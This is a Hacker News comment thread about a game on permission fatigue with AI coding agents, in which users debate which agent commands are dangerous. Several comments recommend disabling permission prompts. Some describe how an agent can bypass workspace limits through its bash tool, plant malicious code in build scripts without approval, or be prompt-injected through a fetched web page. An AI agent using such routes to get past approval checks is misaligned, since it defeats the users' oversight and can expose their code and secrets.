_______ __ _______
| | |.---.-..----.| |--..-----..----. | | |.-----..--.--.--..-----.
| || _ || __|| < | -__|| _| | || -__|| | | ||__ --|
|___|___||___._||____||__|__||_____||__| |__|____||_____||________||_____|
on Gopher (inofficial)
URI Visit Hacker News on the Web
COMMENT PAGE FOR:
URI Show HN: Continue? Y/N: A 60-second game about AI agent permission fatigue
wilg wrote 11 min ago:
"Auto" in Claude and "Auto-review" in Codex are the only way to do
agentic coding.
jMyles wrote 12 min ago:
I haven't run claude code without --dangerously-skip-permissions in
quite some time. I'm surprised that it's still the norm to endure
permission spamming?
(I run it on a VPS of course, not my laptop)
socksy wrote 16 min ago:
Weird to make reading zshrc supposed unsafe when I happily publish it
in my public dotfiles repo... Who the hell keeps API keys in it? OTOH
it seems like lots of these AI tools keep appending PATH in it so I
guess there's a fundamental misunderstanding of shell best practices in
the entire AI space...
Additionally, killing the results of `lsof` is _not_ safe - if, say,
you have the web page open in firefox, or a client subshell in the
agent itself, then boom, there goes firefox and the agent.
graphememes wrote 16 min ago:
Pressed 1 for everything, no regrets
orsorna wrote 21 min ago:
About three quarters of the "bad" choices are things that not only do I
not care about leaking but things that an employer would not punish you
for doing, even if it led to a production incident.
stevenalowe wrote 44 min ago:
Sadly unplayable - gray text on a black background is very hard to read
on a phone
martin-adams wrote 52 min ago:
Very fun. I can only imagine building this with Claude and testing
needed a bit of mental concentration.
t-writescode wrote 1 hour 22 min ago:
I was told I was over protective when the text said âI need to wipe
and build my projectâ and its first thing to do was to read the
details of the (already established) package file. Why did it need to
read the package file to âget contextâ if it was just doing a
standard wipe and build?
Apparently me telling it thatâs the wrong first step and saying
ânoâ is bad; but Iâve seen AI tools waste a ton of time doing a
bunch of random work before they do their job.
spurgelaurels wrote 1 hour 32 min ago:
Fun game, but it showed the lack of security hygiene employed by the
game writer. It said `cat ~/.zshrc` was bad because it would share
tokens and secrets, but I would never put secrets into my shell rc.
londons_explore wrote 1 hour 9 min ago:
Plenty of people would. But then I guess they're in env and
probably already available to Claude
nish__ wrote 1 hour 9 min ago:
Where would you put them?
Hackbraten wrote 58 min ago:
Into `pass`, for example:
URI [1]: https://news.ycombinator.com/item?id=48108207
setopt wrote 58 min ago:
Presumably a CLI-accessible password manager (like `pass`) or a
GPG-encrypted file (like a netrc-style `~/.authinfo.gpg`).
whimblepop wrote 1 hour 36 min ago:
I got "overblocked" for this one:
rm -rf node_modules && npm install
but actually if you're only removing `node_modules` and you have a
working package-lock.json already, what you want is `npm ci`; `npm
install` can mutate package-lock.json and potentially expose you to
supply chain attacks. If you use `npm ci` I think you don't need to `rm
-rf node_modules`, either.
Anyway you should generally run `npm ci` except when you're
deliberately updating your actual dependencies. I'd only permit an `npm
install` if I was adding or updating a dependency, or I'd just reviewed
an `npm ci` failure.
gamer191 wrote 1 hour 18 min ago:
But also why would Claude need to run `rm -rf node_modules && npm
install`? Without the context of seeing what changes itâs made,
Iâd be inclined to assume that Claude has added a new dependency,
which I definitely donât wanna blindly trust it to install
sukhavati wrote 2 hours 1 min ago:
Reminds me of the "Papers, please" game. Glory to Arstotzka!
sandeepkd wrote 2 hours 3 min ago:
Interestingly I kept saying no to everything and some how I am a
security conscious rare engineer who actually read the commands. Guess
doing nothing is the safest approach from security standpoint.
rvz wrote 2 hours 14 min ago:
This current thread is proof of AI psychosis.
stuartjohnson12 wrote 2 hours 10 min ago:
What the hell is going on in this thread? This isn't good. The
"threats" don't make sense. Oh no, all the sensitive information in
my package.json...
cobbal wrote 1 hour 6 min ago:
Here's the threat model I (a luddite) use to evaluate these. The
claude code harness can be mostly trusted, the model cannot be
trusted because it is exposed to untrusted data from the internet,
and there is no separation of data/code in an llm [0][1].
I want to avoid running untrusted code on my local machine, because
it could steal secrets, install malware, etc.
Since the model is allowed to write without restriction (I think)
to the project directory, anything in the project directory is also
untrusted. Running standard commands from the system is fine, as
long as you know what those commands are going to do. Running
anything from the local directory should be avoided because the
code is untrusted.
This is just one security model, there are many others! If a person
is running claude in a stronger sandbox, that changes the model
considerably. What threat model do you use to evaluate whether an
agent's actions are safe?
[0]: [1]:
URI [1]: https://www.schneier.com/essays/archives/2024/05/llms-data...
URI [2]: https://simonwillison.net/2025/Jun/16/the-lethal-trifecta/
kennywinker wrote 1 hour 44 min ago:
If you think the worst that an agent can do is leak your
package.json, your threat model is wayyy broken.
NewJazz wrote 2 hours 18 min ago:
git reset --soft HEAD~1
Uh, how is this an overblock? It is literally a destructive command. No
way I want an LLM agent rewriting my commit history. What if that
commit was already pushed to a protected branch?
stratos123 wrote 40 min ago:
Why do you call it destructive? It rewrites history only locally and
reversibly (the disappeared commit is still in reflog and can be
recovered with another reset) and also doesn't destroy uncommitted
changes, so it's quite safe. You can only lose data with it by
resetting an unpushed commit and then waiting long enough to let the
unreferenced commit be garbage collected.
NewJazz wrote 34 min ago:
Commit history is data. I might not realize what happened until the
gc happens.
ilaksh wrote 2 hours 27 min ago:
You can turn that off with an option in most agents.
My own agent harness/framework has never had any permission system.
It's also never deleted anything it shouldn't or done anything crazy or
unrelated to what I asked.
flux3125 wrote 2 hours 13 min ago:
> It's also never deleted anything it shouldn't or done anything
crazy or unrelated to what I asked
Until it does. A simple curl request to a compromised website could
inject a malicious prompt into it.
fragmede wrote 2 hours 17 min ago:
How many car accidents have you been in, and do you wear your
seatbelt when you're in a car?
Trung0246 wrote 2 hours 29 min ago:
Nice got 6/6
xg15 wrote 2 hours 35 min ago:
This is amazing!
Currently you can "cheat" by simply denying all requests as quickly as
possible. This will give you the "security-conscious engineer" badge
and a perfect score in terms of how many requests were processed. (You
will get the "overblock" notification, but it's somewhat tucked away at
the bottom and the screen still looks as if you won)
I also tried to play as the hustle4lyfe move fast and break things
engineer and simply approved as many requests as quickly as possible -
turns out, the "malicious command" popups actually slow you down. Mean!
misbau wrote 2 hours 37 min ago:
That was fun and gave me an idea how security conscious I am.
ramonga wrote 2 hours 38 min ago:
Score is 6711 by just saying no to everything
atemerev wrote 2 hours 39 min ago:
--dangerously-skip-permissions is the only way to fly. Of course your
environment needs to be properly containerized and autobackup set up,
so even rm -rf from your harness would do nothing. Life is too short to
spend on replying to permissions requests.
prerok wrote 1 hour 52 min ago:
I've seen these suggestions but I am really curious about the set up
because I just don't get it.
If you want to work on the code then you need to have access to the
repositories, so you need the github token. Then, to test the app,
you may need your own backend token. And VPN. Of course, only to DEV,
of course all tokens encrypted. So, only DEV and your branch of the
code is in danger. In my view, even that is pretty bad.
So, how does such a set up work?
kennywinker wrote 1 hour 54 min ago:
Lol. Countdown til you get pwned starts today. Let me know how that
works out for you in six months.
kqr wrote 2 hours 41 min ago:
Fun! Played twice and refused all dangerous commands, with only one
"over-block". Although I disagree that saying no to `kill $(lsof -t
-i:3000)` is over-blocking. It's such a simple command I'd rather run
it myself and be fully aware of what process I'm killing.
axod wrote 2 hours 43 min ago:
Fun little game, but I think the questions jump context so much it's a
little unrepresentative. It might be better to group things into
"packs", which have more real-world representative structure to them.
For example, lots of "editing something.js" file permission requests,
and then an "npm publish" is far more normal, and it's more of a risk,
if you're used to pressing Y lots and then suddenly out of the blue...
bspammer wrote 2 hours 45 min ago:
To be realistic, 99% of the time it should be a totally innocuous
command. If half of the commands are dangerous then you don't get
fatigue because you're aware what you're doing is dangerous.
Wirbelwind wrote 2 hours 46 min ago:
Thanks all for checking it out and your suggestions!
If anyone is curious about the actual underlying risks and problems
with some mitigations (like the 17% false-negative rates of Auto Mode),
I wrote up a quick summary of some of the approaches here
URI [1]: https://scalex.dev/blog/ai-agent-permissions/
soanvig wrote 2 hours 54 min ago:
Fun game.
Can somebody run an agent against those questions to see how it
performs? :)
zackify wrote 3 hours 9 min ago:
I vibe coded a TUI that just shows running lxd containers
I hit 'n' to toggle all network access minus anthropic and openai URLs.
I use pi (sometimes claude, always on bypass) and I auto allow
everything. I only toggle manual approval in rare cases like running a
script or command that needs to touch a production system and I need to
validate everything.
Normally my container has full write access to staging so it can debug
and validate everything on its own
kennywinker wrote 1 hour 58 min ago:
Sounds like your process has made you vulnerable to huge classes of
exploits and accidents. You have no oversight of changes locally, and
only focus on when it touches prod. That means toxic local changes
can get in, and if it works in staging why would you look too closely
at it before merging to prod? Meanwhile a malicious npm package has
made it into your repo, and your staging api keys have been sent to
the command and control server.
cobbal wrote 3 hours 10 min ago:
That's funny. It told me that blocking "npm run build" was the wrong
answer. Maybe it doesn't really under The threat model.
dns_snek wrote 2 hours 12 min ago:
That's a great example of how dangerous actions are perceived as
innocent. The entire model of approving specific commands is
absolutely bonkers.
npm run build = run an arbitrary shell command written in
package.json
Meanwhile the agent could have done any of the following without
approval:
- edited `package.json` to contain any arbitrary build command
- planted malicious code in `build.js` (called by `npm run build`)
- planted malicious code in `node_modules/xyz/index.js` (imported by
`build.js`)
nonethewiser wrote 36 min ago:
Yup. The most secure computer is one encased in concrete and
dropped into the ocean.
amarant wrote 44 min ago:
What would a better system look like?
nonethewiser wrote 35 min ago:
Not using agents at all. It could edit your code to do something
malicious when you run it. Not even once. Not even if the agent
has a gun to your head.
Liftyee wrote 3 hours 19 min ago:
I haven't used local agentic AI yet for programming projects. Hence,
-187 score
The filter for "commands I would run myself" and "commands I would let
an agent run" are very different it seems.
rogerrogerr wrote 23 min ago:
Thinking about agents as remote junior devs who _might_ be North
Korean operatives has been the right model for me.
ghrl wrote 3 hours 21 min ago:
I am mostly using OpenCode and barely ever see a permission prompt.
While they do enforce it for outside workspace read/write, with the
bash tool the agent can just bypass that. I'm not quite sure why it is
that way, and it certainly isn't a very good solution, but likely not
worse than asking for everything which just trains the user to always
accept and provides a false sense of security then.
sevenseacat wrote 3 hours 28 min ago:
Continue? Y/N ââ SCORE: 2,343
Security-Conscious Engineer
Caught 8/8 threats
"Not a single secret leaked"
â llmgame.scalex.dev
neogodless wrote 33 min ago:
Continue? Y/N ââ SCORE: 1,549 Security-Conscious Engineer
Caught 3/3 threats "Not a single secret leaked"
So are there 3 threats? 8? Is it a different game?
Does everyone get a "good" score even if they missed 5 threats?!
MeetingsBrowser wrote 3 hours 32 min ago:
It would be cool to see the distribution of all player scores.
Wirbelwind wrote 2 hours 50 min ago:
That's a great idea, stay tuned
carterschonwald wrote 3 hours 34 min ago:
some of the sandboxing ive been playing with gives me the best of both
yolo and like logic programming tier perms on llm actions in env.
still not ready for prime time though ;)
ashishb wrote 46 min ago:
I ended up writing my own.
And have been running LLMs as well as simple tools like linters and
even `npm` inside it for months now.
URI [1]: https://ashishb.net/programming/amazing-sandbox/
cadwell wrote 3 hours 37 min ago:
1,640 points on my first tryâI fell into a few traps, but it was
really interesting. Thanks for the little game! I'm sharing it with my
coworkers :)
nardib wrote 5 hours 35 min ago:
Use this and save yourself:
claude --dangerously-skip-permissions
maxbond wrote 57 min ago:
Why would you do this now that we have auto mode?
kennywinker wrote 1 hour 51 min ago:
Itâs baking malicious code into your project, but hey it didnât
run rm -rf so⦠weâre good.
paulddraper wrote 2 hours 22 min ago:
alias yolo=claude --dangerously-skip-permissions
dheera wrote 3 hours 12 min ago:
I got tired of typing that and just do
alias claude="claude --dangerously-skip-permissions"
I do have a separate "claude" user on my system without sudo access
and without access to my main user home dir
And yeah I know that's not perfect but I'm trying to get shit done
franze wrote 2 hours 47 min ago:
alias claude+="claude --dangerously-skip-permissions"
alias claude++="claude --dangerously-skip-permissions --continue"
tasuki wrote 3 hours 31 min ago:
Just make sure to run it in an isolated environment where it's ok to
mess things up, and make sure it doesn't have access to any secrets.
wildpeaks wrote 3 hours 38 min ago:
This is why having a human in the loop isn't enough because they will
cut corners and skip reviewing what they should review.
preciousoo wrote 2 hours 45 min ago:
I created a watcher for this problem, to watch my PRs for
unfinished scope and have a fresh Claude review
Uses tmux and gh
URI [1]: https://github.com/Kyu/claude-pr-watch
chuckadams wrote 3 hours 34 min ago:
A tool that pushes people into permissions fatigue is in fact the
proper recipient of the blame. The tool in question here is the
entire system though, including the OS with insufficient permission
boundaries in userspace, not just the agent
kennywinker wrote 1 hour 47 min ago:
A tool that bypasses permission requests because theyâre
annoying will be just as guilty when the repo is poisoned.
chuckadams wrote 37 min ago:
I'm not saying wedging doorstops under the fire doors is a good
thing, I'm just saying look at the situation that's making
people put the doorstops there. Or something, it's not a great
analogy. I'm just saying that shaming the user belongs with
obscurity in the list of security mechanisms that don't work
out in practice.
qsxfthnkp2322 wrote 3 hours 41 min ago:
I love it when Claude is dangerous
DIR <- back to front page